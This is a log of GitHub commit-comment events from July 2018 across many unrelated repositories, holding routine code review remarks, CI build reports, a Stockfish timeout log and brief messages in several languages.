{"id":"7936346502","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/govcraft"},"payload":{"comment":{"id":29638532,"position":null,"line":null,"path":null,"commit_id":"57a224effff132fcf426a288a164ded9d872bccd","created_at":"2018-07-09T09:08:26Z","updated_at":"2018-07-09T09:08:26Z","author_association":"CONTRIBUTOR","body":"앗, 잘못 올라갔군요. 없어도 되는 부분이네요. 수정하겠습니다. "}},"created_at":"2018-07-09T09:08:26Z"}
{"id":"7936347543","type":"CommitCommentEvent","actor":{"login":"alex-ab"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29638534,"position":null,"line":null,"path":null,"commit_id":"a4adbe7f5b0fdde53ed6fa8575f6dcdc5a7c9aa7","created_at":"2018-07-09T09:08:39Z","updated_at":"2018-07-09T09:08:39Z","author_association":"OWNER","body":"@nfeske: please add to staging or next sculpt branch"}},"created_at":"2018-07-09T09:08:39Z"}
{"id":"7936351020","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29638541,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-09T09:09:18Z","updated_at":"2018-07-09T09:09:18Z","author_association":"NONE","body":"Luckily I have captured one timeout happened and here is the output:\r\n```\r\nFinished game 192 (Base-d2752fd vs New-fbbc57c): 1/2-1/2 {Draw by adjudication}\r\nScore of New-fbbc57c vs Base-d2752fd: 37 - 50 - 105  [0.466] 192\r\nTask updated successfully in 0.246465s\r\nStarted game 204 of 250 (Base-d2752fd vs New-fbbc57c)\r\nFinished game 194 (Base-d2752fd vs New-fbbc57c): 1/2-1/2 {Draw by adjudication}\r\nScore of New-fbbc57c vs Base-d2752fd: 37 - 50 - 106  [0.466] 193\r\nTask updated successfully in 0.262228s\r\nStarted game 205 of 250 (New-fbbc57c vs Base-d2752fd)\r\nFinished game 196 (Base-d2752fd vs New-fbbc57c): 0-1 {White loses on time}\r\nScore of New-fbbc57c vs Base-d2752fd: 38 - 50 - 106  [0.469] 194\r\nTask updated successfully in 0.253937s\r\nStarted game 206 of 250 (Base-d2752fd vs New-fbbc57c)\r\nFinished game 195 (New-fbbc57c vs Base-d2752fd): 1/2-1/2 {Draw by adjudication}\r\nScore of New-fbbc57c vs Base-d2752fd: 38 - 50 - 107  [0.469] 195\r\nTask updated successfully in 0.241387s\r\nStarted game 207 of 250 (New-fbbc57c vs Base-d2752fd)\r\nFinished game 193 (New-fbbc57c vs Base-d2752fd): 1/2-1/2 {Draw by adjudication}\r\nScore of New-fbbc57c vs Base-d2752fd: 38 - 50 - 108  [0.469] 196\r\nTask updated successfully in 0.613366s\r\nStarted game 208 of 250 (Base-d2752fd vs New-fbbc57c)\r\n\r\n```\r\n\r\n\r\nAnd for most of the time top looks like this, and CPU seems not capping.\r\n```\r\n\r\ntop - 17:08:31 up 7 days, 16:46,  1 user,  load average: 349.73, 344.59, 339.71\r\nTasks: 2489 total,   3 running, 2486 sleeping,   0 stopped,   0 zombie\r\n%Cpu(s): 88.0 us,  1.1 sy,  0.0 ni, 10.9 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st\r\nKiB Mem : 15836514+total, 30716601+free, 20996052 used, 12554894+buff/cache\r\nKiB Swap:  4194300 total,  4194300 free,        0 used. 15598877+avail Mem\r\n\r\n   PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND\r\n403093 root      20   0 4988848 418376   1612 S  3089  0.0 206:35.00 stockfish_fbbc5\r\n403116 root      20   0 4988848 418628   1612 S  2653  0.0 200:40.51 stockfish_d2752\r\n403090 root      20   0 4988848 418576   1612 S  2565  0.0 202:06.94 stockfish_d2752\r\n403084 root      20   0 4988848 427596   1612 S  2009  0.0 201:42.55 stockfish_d2752\r\n403132 root      20   0 4988848 417940   1612 S  1771  0.0 198:29.45 stockfish_fbbc5\r\n403266 root      20   0 4988848 423632   1612 S  1767  0.0 201:33.54 stockfish_d2752\r\n403143 root      20   0 4988848 418040   1612 S  1629  0.0 200:14.50 stockfish_fbbc5\r\n403086 root      20   0 4988848 418784   1612 S  1621  0.0 199:10.23 stockfish_d2752\r\n403274 root      20   0 4988848 420352   1612 S  1612  0.0 203:43.39 stockfish_fbbc5\r\n403140 root      20   0 4988848 418100   1612 S  1600  0.0 202:05.78 stockfish_fbbc5\r\n403152 root      20   0 4988848 420604   1612 S  1577  0.0 197:24.95 stockfish_fbbc5\r\n403145 root      20   0 4988848 419036   1612 S  1419  0.0 200:19.88 stockfish_d2752\r\n403272 root      20   0 4988848 425292   1612 S  1413  0.0 199:28.53 stockfish_d2752\r\n403120 root      20   0 4988848 419140   1612 S  1356  0.0 198:33.70 stockfish_d2752\r\n403125 root      20   0 4988848 428264   1612 S  1305  0.0 202:12.84 stockfish_fbbc5\r\n403137 root      20   0 4988848 418472   1612 S  1194  0.0 204:31.86 stockfish_d2752\r\n403261 root      20   0 4988848 417844   1612 S  1163  0.0 202:44.53 stockfish_fbbc5\r\n403087 root      20   0 4988848 418932   1612 S  1110  0.0 199:44.25 stockfish_fbbc5\r\n403149 root      20   0 4988848 418384   1612 S  1065  0.0 199:37.84 stockfish_d2752\r\n403134 root      20   0 4988848 420504   1612 S 869.7  0.0 204:32.35 stockfish_d2752\r\n403083 root      20   0 4988848 426244   1612 S 857.8  0.0 203:34.25 stockfish_fbbc5\r\n403095 root      20   0 4988848 418580   1612 S 381.7  0.0 203:01.15 stockfish_fbbc5\r\n403089 root      20   0 4988848 425952   1612 S 367.9  0.0 202:12.18 stockfish_fbbc5\r\n403079 root      20   0 1134792   9884   4424 R   9.2  0.0   1:30.56 cutechess-cli\r\n420268 root      20   0  164656   4836   1584 R   9.2  0.0   0:00.44 top\r\n\r\n```"}},"created_at":"2018-07-09T09:09:18Z"}
{"id":"7936351672","type":"CommitCommentEvent","actor":{"login":"zonghan80"},"repo":{"name":"zonghan80/hello-world"},"payload":{"comment":{"id":29638543,"position":4,"line":4,"path":"README.md","commit_id":"5a173c53c0d96605f973733261ae1acfbd36a1fd","created_at":"2018-07-09T09:09:26Z","updated_at":"2018-07-09T09:09:26Z","author_association":"OWNER","body":"I`m only a junior now"}},"created_at":"2018-07-09T09:09:26Z"}
{"id":"7936351813","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638544,"position":59,"line":142,"path":"lib/cocoapods/installer/xcode/pods_project_generator/target_installer.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T09:09:27Z","updated_at":"2018-07-09T09:09:27Z","author_association":"OWNER","body":" + def create_info_plist_file(path, native_target, version, platform, bundle_package_type = :fmwk)"}},"created_at":"2018-07-09T09:09:27Z"}
{"id":"7936352779","type":"CommitCommentEvent","actor":{"login":"NateWr"},"repo":{"name":"Vitaliy-1/pkp-lib"},"payload":{"comment":{"id":29638549,"position":4,"line":112,"path":"locale/en_US/user.xml","commit_id":"36363e57ed26f74623cd7062304406bf683b5dfc","created_at":"2018-07-09T09:09:39Z","updated_at":"2018-07-09T09:09:39Z","author_association":"NONE","body":"I meant that you should combine the localised strings `user.register.form.privacyConsentContext` and `user.register.form.privacyConsentContextData` into one."}},"created_at":"2018-07-09T09:09:39Z"}
{"id":"7936352911","type":"CommitCommentEvent","actor":{"login":"F-loat"},"repo":{"name":"F-loat/ithome-lite"},"payload":{"comment":{"id":29638550,"position":null,"line":null,"path":null,"commit_id":"9137744e25000cbaa82529639976b3ddea3b5f1b","created_at":"2018-07-09T09:09:41Z","updated_at":"2018-07-09T09:09:41Z","author_association":"OWNER","body":"多个属性又不会影响什么，相关文章里不是有介绍 https://juejin.im/post/5ab84a33f265da239c7b56bd"}},"created_at":"2018-07-09T09:09:41Z"}
{"id":"7936367282","type":"CommitCommentEvent","actor":{"login":"jamiemurray"},"repo":{"name":"salesagility/SuiteCRM"},"payload":{"comment":{"id":29638570,"position":null,"line":null,"path":null,"commit_id":"a60c60f123c48416ebee0ead27879a2060737844","created_at":"2018-07-09T09:12:33Z","updated_at":"2018-07-09T09:12:33Z","author_association":"NONE","body":"This commit breaks the DetailView of emails when using xampp. Specifically the vardefs.php change. "}},"created_at":"2018-07-09T09:12:33Z"}
{"id":"7936368142","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/govcraft"},"payload":{"comment":{"id":29638572,"position":null,"line":null,"path":null,"commit_id":"57a224effff132fcf426a288a164ded9d872bccd","created_at":"2018-07-09T09:12:43Z","updated_at":"2018-07-09T09:12:43Z","author_association":"CONTRIBUTOR","body":"저는 내용없음이라고 보여주지 않는게 좋아 보이는데요"}},"created_at":"2018-07-09T09:12:43Z"}
{"id":"7936369174","type":"CommitCommentEvent","actor":{"login":"ekasnh"},"repo":{"name":"WhitespaceRed/whitespacered.github.io"},"payload":{"comment":{"id":29638575,"position":null,"line":null,"path":null,"commit_id":"7b4c504c5446d23638a065a03d1fb6aa383be903","created_at":"2018-07-09T09:12:55Z","updated_at":"2018-07-09T09:12:55Z","author_association":"MEMBER","body":"There is a thing called color scheme."}},"created_at":"2018-07-09T09:12:55Z"}
{"id":"7936370833","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638577,"position":1,"line":4,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T09:13:13Z","updated_at":"2018-07-09T09:13:13Z","author_association":"OWNER","body":"Module pod\r\nClass installer\r\nClass xcode"}},"created_at":"2018-07-09T09:13:13Z"}
{"id":"7936370910","type":"CommitCommentEvent","actor":{"login":"NickKaramoff"},"repo":{"name":"project-six/it-museum"},"payload":{"comment":{"id":29638578,"position":null,"line":null,"path":null,"commit_id":"565c6013efbc0a8330068fac09f90dc352622ced","created_at":"2018-07-09T09:13:13Z","updated_at":"2018-07-09T09:13:13Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Инициализировать приложение Django](https://trello.com/c/0pN4ColS/22-%D0%B8%D0%BD%D0%B8%D1%86%D0%B8%D0%B0%D0%BB%D0%B8%D0%B7%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%BF%D1%80%D0%B8%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D0%B5-django)"}},"created_at":"2018-07-09T09:13:13Z"}
{"id":"7936372414","type":"CommitCommentEvent","actor":{"login":"NickKaramoff"},"repo":{"name":"project-six/it-museum"},"payload":{"comment":{"id":29638582,"position":null,"line":null,"path":null,"commit_id":"eb30eabda616f33102dddf65dad5314bf46c41e4","created_at":"2018-07-09T09:13:28Z","updated_at":"2018-07-09T09:13:28Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Создать страницу-заглушку](https://trello.com/c/3KJtlFWA/23-%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D1%82%D1%8C-%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%B8%D1%86%D1%83-%D0%B7%D0%B0%D0%B3%D0%BB%D1%83%D1%88%D0%BA%D1%83)"}},"created_at":"2018-07-09T09:13:28Z"}
{"id":"7936373989","type":"CommitCommentEvent","actor":{"login":"NickKaramoff"},"repo":{"name":"project-six/it-museum"},"payload":{"comment":{"id":29638587,"position":null,"line":null,"path":null,"commit_id":"90ae2e21d13a9a591699a8024d98fe68be84588a","created_at":"2018-07-09T09:13:46Z","updated_at":"2018-07-09T09:13:46Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Создать страницу-заглушку](https://trello.com/c/3KJtlFWA/23-%D1%81%D0%BE%D0%B7%D0%B4%D0%B0%D1%82%D1%8C-%D1%81%D1%82%D1%80%D0%B0%D0%BD%D0%B8%D1%86%D1%83-%D0%B7%D0%B0%D0%B3%D0%BB%D1%83%D1%88%D0%BA%D1%83)"}},"created_at":"2018-07-09T09:13:46Z"}
{"id":"7936374200","type":"CommitCommentEvent","actor":{"login":"AndyXia"},"repo":{"name":"AndyXia/Activities"},"payload":{"comment":{"id":29638589,"position":null,"line":null,"path":null,"commit_id":"bd77e778a863eaba6fd7d71d01f272e329f955c1","created_at":"2018-07-09T09:13:48Z","updated_at":"2018-07-09T09:13:48Z","author_association":"OWNER","body":"第三方的"}},"created_at":"2018-07-09T09:13:48Z"}
{"id":"7936375933","type":"CommitCommentEvent","actor":{"login":"AKuederle"},"repo":{"name":"ppinard/matplotlib-scalebar"},"payload":{"comment":{"id":29638592,"position":null,"line":null,"path":null,"commit_id":"80e2142b081a2f065655dd8a55abad6207f1a32c","created_at":"2018-07-09T09:14:07Z","updated_at":"2018-07-09T09:14:07Z","author_association":"CONTRIBUTOR","body":"Is Python 3.7 unsupported by Travis or unsupported by the Package?"}},"created_at":"2018-07-09T09:14:07Z"}
{"id":"7936376098","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638593,"position":11,"line":14,"path":"lib/cocoapods/installer/xcode/pods_project_generator.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T09:14:09Z","updated_at":"2018-07-09T09:14:09Z","author_association":"OWNER","body":"+ require"}},"created_at":"2018-07-09T09:14:09Z"}
{"id":"7936376439","type":"CommitCommentEvent","actor":{"login":"qulong"},"repo":{"name":"qulong/Note"},"payload":{"comment":{"id":29638594,"position":282,"line":280,"path":"README.md","commit_id":"598ec0693547e7ad6b7ecff6009109e4b47bea21","created_at":"2018-07-09T09:14:12Z","updated_at":"2018-07-09T09:14:12Z","author_association":"OWNER","body":"61. https://github.com/FussenYu/DaemonProject\r\n app保活 不容易被杀死（我没有试过）"}},"created_at":"2018-07-09T09:14:12Z"}
{"id":"7936384703","type":"CommitCommentEvent","actor":{"login":"Yardanico"},"repo":{"name":"drizzt/vps2arch"},"payload":{"comment":{"id":29638617,"position":null,"line":null,"path":null,"commit_id":"2e585ba6fc71c5e0018c6769dd76235fd0fe0697","created_at":"2018-07-09T09:15:44Z","updated_at":"2018-07-09T09:15:44Z","author_association":"NONE","body":"@drizzt but Microsoft didn't buy GitHub yet..."}},"created_at":"2018-07-09T09:15:44Z"}
{"id":"7936386206","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29638621,"position":null,"line":null,"path":null,"commit_id":"0d2ebe48ef509661174be5915fdb327ba855ee40","created_at":"2018-07-09T09:16:01Z","updated_at":"2018-07-09T09:16:01Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=381)"}},"created_at":"2018-07-09T09:16:01Z"}
{"id":"7936386304","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29638622,"position":null,"line":null,"path":null,"commit_id":"0d2ebe48ef509661174be5915fdb327ba855ee40","created_at":"2018-07-09T09:16:02Z","updated_at":"2018-07-09T09:16:02Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T09:16:02Z"}
{"id":"7936387671","type":"CommitCommentEvent","actor":{"login":"tsusanka"},"repo":{"name":"trezor/trezor-core"},"payload":{"comment":{"id":29638623,"position":54,"line":54,"path":"src/apps/lisk/layout.py","commit_id":"b6949f61537dc599ea641ef0af570a947c32cd08","created_at":"2018-07-09T09:16:17Z","updated_at":"2018-07-09T09:16:17Z","author_association":"CONTRIBUTOR","body":"@jpochyla This should use `utils.format_amount`, shouldn't it? I think in case of small numbers this will display the \"scientific notation\" - e.g. 4e-05"}},"created_at":"2018-07-09T09:16:17Z"}
{"id":"7936390781","type":"CommitCommentEvent","actor":{"login":"MartianLee"},"repo":{"name":"parti-xyz/govcraft"},"payload":{"comment":{"id":29638630,"position":null,"line":null,"path":null,"commit_id":"57a224effff132fcf426a288a164ded9d872bccd","created_at":"2018-07-09T09:16:52Z","updated_at":"2018-07-09T09:16:52Z","author_association":"CONTRIBUTOR","body":"그런가요? 답변보기가 어떤 기업은 있고 없고 어떤 기업은 없는 상황에서는 지금처럼 저희가 캐치해서 답변을 한번 더 요구하는 쪽이 나을까요?"}},"created_at":"2018-07-09T09:16:52Z"}
{"id":"7936393364","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29638636,"position":null,"line":null,"path":null,"commit_id":"87ed032038f5e1e73a6cf06aea73e635679228c5","created_at":"2018-07-09T09:17:23Z","updated_at":"2018-07-09T09:17:23Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2311 of 2311 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-09T09:17:23Z"}
{"id":"7936397209","type":"CommitCommentEvent","actor":{"login":"annahprice"},"repo":{"name":"NHS-NSS-transforming-publications/Hospital-Acute-Activity"},"payload":{"comment":{"id":29638645,"position":null,"line":null,"path":null,"commit_id":"91c21662a583b9c8ae31adf0402939960cd1e618","created_at":"2018-07-09T09:18:09Z","updated_at":"2018-07-09T09:18:09Z","author_association":"NONE","body":":tada: "}},"created_at":"2018-07-09T09:18:09Z"}
{"id":"7936398224","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/govcraft"},"payload":{"comment":{"id":29638647,"position":null,"line":null,"path":null,"commit_id":"57a224effff132fcf426a288a164ded9d872bccd","created_at":"2018-07-09T09:18:20Z","updated_at":"2018-07-09T09:18:20Z","author_association":"CONTRIBUTOR","body":"있는 건 답변 보기가 있는게 당연한데, 없다고 없음 보이는게 그냥 군더더기라 생각되네요"}},"created_at":"2018-07-09T09:18:20Z"}
{"id":"7936399438","type":"CommitCommentEvent","actor":{"login":"vermorel"},"repo":{"name":"Lokad/Adrien"},"payload":{"comment":{"id":29638650,"position":69,"line":81,"path":"src/spikes/2/Adrien.Core/Compiler/Var.cs","commit_id":"07fe8206396bb02f00adefc2e252cdf2beae9d86","created_at":"2018-07-09T09:18:34Z","updated_at":"2018-07-09T09:18:34Z","author_association":"MEMBER","body":"What is the performance of this line? It looks to me like a deep copy. Ideally, we would skip such a deep copy altogether here. If not, then, we should probably leave an inline comment to get back at the case later."}},"created_at":"2018-07-09T09:18:34Z"}
{"id":"7936402540","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29638651,"position":null,"line":null,"path":null,"commit_id":"87ed032038f5e1e73a6cf06aea73e635679228c5","created_at":"2018-07-09T09:19:08Z","updated_at":"2018-07-09T09:19:08Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-87ed032038f5e1e73a6cf06aea73e635679228c5-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-09T09:19:08Z"}
{"id":"7936407284","type":"CommitCommentEvent","actor":{"login":"13774564599"},"repo":{"name":"forezp/SpringcloudConfig"},"payload":{"comment":{"id":29638657,"position":null,"line":null,"path":null,"commit_id":"440cc50e205b58069d6152f27eae1e0710c99734","created_at":"2018-07-09T09:20:03Z","updated_at":"2018-07-09T09:20:03Z","author_association":"NONE","body":"112"}},"created_at":"2018-07-09T09:20:03Z"}
{"id":"7936409492","type":"CommitCommentEvent","actor":{"login":"connor-baer"},"repo":{"name":"sumup/circuit-ui"},"payload":{"comment":{"id":29638663,"position":4,"line":36,"path":"src/components/Badge/Badge.spec.js","commit_id":"e98e1a355e955257e4a5b31920db11d67a95a6de","created_at":"2018-07-09T09:20:27Z","updated_at":"2018-07-09T09:20:27Z","author_association":"MEMBER","body":"\"only when\" - nitpick 😉"}},"created_at":"2018-07-09T09:20:27Z"}
{"id":"7936416258","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29638679,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-09T09:21:42Z","updated_at":"2018-07-09T09:21:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T09:21:42Z"}
{"id":"7936416473","type":"CommitCommentEvent","actor":{"login":"0xbug"},"repo":{"name":"WhaleShark-Team/cobra"},"payload":{"comment":{"id":29638680,"position":null,"line":null,"path":null,"commit_id":"cffc941d044a1b74ed28356be87f08ee386de2a4","created_at":"2018-07-09T09:21:45Z","updated_at":"2018-07-09T09:21:45Z","author_association":"NONE","body":"这里只是不进行统计, 白名单应该加在这里 https://github.com/WhaleShark-Team/cobra/blob/6e65544616d837d5ef20409a2c0ae5e51c59f2f4/cobra/engine.py#L358"}},"created_at":"2018-07-09T09:21:45Z"}
{"id":"7936453765","type":"CommitCommentEvent","actor":{"login":"tripwires"},"repo":{"name":"AthenaGaKill/Tripster-Coding-Ex"},"payload":{"comment":{"id":29638766,"position":17,"line":29,"path":"Exa.html","commit_id":"15a616d121940b25bb459c210a4a504c2c8881d9","created_at":"2018-07-09T09:28:41Z","updated_at":"2018-07-09T09:28:41Z","author_association":"COLLABORATOR","body":"maxLengthWord should be a parameter (placeholder) in this context. It is better to issolate your functions then to make them depend to global variables."}},"created_at":"2018-07-09T09:28:41Z"}
{"id":"7936454295","type":"CommitCommentEvent","actor":{"login":"AbdulSuhaib"},"repo":{"name":"cyborgonwheels/GEN"},"payload":{"comment":{"id":29638768,"position":1,"line":1,"path":"WebApplication1/.bowerrc","commit_id":"6c4c1bfe6090453a88531602feb317bd5c14df03","created_at":"2018-07-09T09:28:48Z","updated_at":"2018-07-09T09:28:48Z","author_association":"NONE","body":"Blockchain using ASP.Net Code\r\n"}},"created_at":"2018-07-09T09:28:48Z"}
{"id":"7936457978","type":"CommitCommentEvent","actor":{"login":"vermorel"},"repo":{"name":"Lokad/Adrien"},"payload":{"comment":{"id":29638776,"position":47,"line":145,"path":"src/spikes/2/Adrien.Core/Notation/Tensor.cs","commit_id":"07fe8206396bb02f00adefc2e252cdf2beae9d86","created_at":"2018-07-09T09:29:28Z","updated_at":"2018-07-09T09:29:28Z","author_association":"MEMBER","body":"I do not understand the intent of the method `RankToTensorName()` ."}},"created_at":"2018-07-09T09:29:28Z"}
{"id":"7936462609","type":"CommitCommentEvent","actor":{"login":"nisabostanci"},"repo":{"name":"GitBusting/CalendarWebApp"},"payload":{"comment":{"id":29638795,"position":null,"line":null,"path":null,"commit_id":"1785a7f687c52b16cacda3fe196d3ffee7ed693d","created_at":"2018-07-09T09:30:19Z","updated_at":"2018-07-09T09:30:19Z","author_association":"CONTRIBUTOR","body":"#4 "}},"created_at":"2018-07-09T09:30:19Z"}
{"id":"7936462949","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638798,"position":null,"line":null,"path":null,"commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T09:30:23Z","updated_at":"2018-07-09T09:30:23Z","author_association":"OWNER","body":"[CocoaPods/spec/unit/target/pod_target_spec.rb](url)"}},"created_at":"2018-07-09T09:30:23Z"}
{"id":"7936467186","type":"CommitCommentEvent","actor":{"login":"punoqun"},"repo":{"name":"GitBusting/CalendarApp"},"payload":{"comment":{"id":29638806,"position":null,"line":null,"path":null,"commit_id":"b6553b123952ddfbeaf25dbd7ce8643f1ce3c014","created_at":"2018-07-09T09:31:03Z","updated_at":"2018-07-09T09:31:03Z","author_association":"CONTRIBUTOR","body":"#5"}},"created_at":"2018-07-09T09:31:03Z"}
{"id":"7936469168","type":"CommitCommentEvent","actor":{"login":"dsdstudio"},"repo":{"name":"dsdstudio/wiki"},"payload":{"comment":{"id":29638809,"position":56,"line":56,"path":"C.org","commit_id":"1ea01489bbeeb272aafa48ce584a7bd299f777a7","created_at":"2018-07-09T09:31:26Z","updated_at":"2018-07-09T09:31:26Z","author_association":"OWNER","body":"약간 묵시적인 approach이긴 한데 "}},"created_at":"2018-07-09T09:31:26Z"}
{"id":"7936470752","type":"CommitCommentEvent","actor":{"login":"vermorel"},"repo":{"name":"Lokad/Adrien"},"payload":{"comment":{"id":29638811,"position":17,"line":18,"path":"src/spikes/2/Adrien.Core/Compiler/Var.cs","commit_id":"07fe8206396bb02f00adefc2e252cdf2beae9d86","created_at":"2018-07-09T09:31:44Z","updated_at":"2018-07-09T09:31:44Z","author_association":"MEMBER","body":"What is the use case for having a non-initialized `Var<T>`? It seems that all constructors below are setting `Initialized` at `true`. It would be nice to clarify the intent."}},"created_at":"2018-07-09T09:31:44Z"}
{"id":"7936471332","type":"CommitCommentEvent","actor":{"login":"nisabostanci"},"repo":{"name":"GitBusting/CalendarWebApp"},"payload":{"comment":{"id":29638812,"position":null,"line":null,"path":null,"commit_id":"2b86f5c38390fbc2b90eee37fd9761537646e902","created_at":"2018-07-09T09:31:51Z","updated_at":"2018-07-09T09:31:51Z","author_association":"CONTRIBUTOR","body":"#12 "}},"created_at":"2018-07-09T09:31:51Z"}
{"id":"7936474225","type":"CommitCommentEvent","actor":{"login":"GortiZ6"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":29638816,"position":null,"line":null,"path":null,"commit_id":"6b78b13871123b66bdfbeaa7eead1144d4ee4c59","created_at":"2018-07-09T09:32:23Z","updated_at":"2018-07-09T09:32:23Z","author_association":"CONTRIBUTOR","body":"Thanks a lot for the changes and the merge!"}},"created_at":"2018-07-09T09:32:23Z"}
{"id":"7936474666","type":"CommitCommentEvent","actor":{"login":"punoqun"},"repo":{"name":"GitBusting/CalendarApp"},"payload":{"comment":{"id":29638817,"position":null,"line":null,"path":null,"commit_id":"4b620f34f6f048c0b9efb6908ba56649411ba428","created_at":"2018-07-09T09:32:28Z","updated_at":"2018-07-09T09:32:28Z","author_association":"CONTRIBUTOR","body":"#6"}},"created_at":"2018-07-09T09:32:28Z"}
{"id":"7936476408","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/CocoaPods"},"payload":{"comment":{"id":29638819,"position":3,"line":519,"path":"spec/unit/target/pod_target_spec.rb","commit_id":"a06317eb8e72c9e7cd3a4ef651cde1ecfaed3bbc","created_at":"2018-07-09T09:32:47Z","updated_at":"2018-07-09T09:32:47Z","author_association":"OWNER","body":"@@ -517,10 +517,6 @@ module Pod"}},"created_at":"2018-07-09T09:32:47Z"}
{"id":"7936480213","type":"CommitCommentEvent","actor":{"login":"kurtn2005"},"repo":{"name":"allstreaming/aria2"},"payload":{"comment":{"id":29638826,"position":null,"line":null,"path":null,"commit_id":"510a5207a86a1f5e58ae4ba0fd0023627f525dd5","created_at":"2018-07-09T09:33:31Z","updated_at":"2018-07-09T09:33:31Z","author_association":"CONTRIBUTOR","body":"Currently it's 1.34.0 with AsyncDNS, BitTorrent, Firefox3 Cookies, GZip, HTTPS, Message Digest, Metalink, XML-RPC and SFTP enabled, has been tested on my DS216j."}},"created_at":"2018-07-09T09:33:31Z"}
